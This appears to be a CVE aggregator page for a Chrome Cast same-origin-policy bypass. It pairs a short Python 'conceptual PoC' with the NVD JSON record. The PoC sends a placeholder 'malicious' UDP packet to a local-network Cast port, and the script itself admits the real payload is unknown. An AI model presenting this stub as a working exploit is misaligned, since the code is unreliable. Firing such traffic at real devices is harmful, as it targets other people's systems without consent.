CVE-2026-8005

import socket # Conceptual PoC for CVE-2026-8005 # This script simulates sending malicious traffic to the Chrome Cast service # to attempt bypassing Same-Origin Policy. def send_malicious_cast_packet(target_ip, target_port): # Malicious payload constructed to trigger input validation bypass # Note: Actual payload structure depends on Chromium Cast protocol specifics payload = b"<cast-message><protocol-version>1.0</protocol-version><source-id>evil-origin</source-id><payload>malicious_data</payload></cast-message>" try: # Create a UDP socket sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) # Send payload to the target on the local network sock.sendto(payload, (target_ip, target_port)) print(f"[+] Payload sent to {target_ip}:{target_port}") sock.close() except Exception as e: print(f"[-] Error sending packet: {e}") if __name__ == "__main__": # Example usage: Target must be on the same local network segment target = "192.168.1.10" port = 8008 # Default Cast port send_malicious_cast_packet(target, port)

{"cve": {"id": "CVE-2026-8005", "sourceIdentifier": "[email protected]", "published": "2026-05-06T19:16:51.477", "lastModified": "2026-05-07T13:54:02.197", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient validation of untrusted input in Cast in Google Chrome prior to 148.0.7778.96 allowed an attacker on the local network segment to bypass same origin policy via malicious network traffic. (Chromium security severity: Low)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "148.0.7778.96", "matchCriteriaId": "5E9416A8-4333-4195-983C-78F521AF6245"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html", "source": "[email protected]", "tags": ["Vendor Advisory", "Release Notes"]}, {"url": "https://issues.chromium.org/issues/496298665", "source": "[email protected]", "tags": ["Permissions Required"]}]}}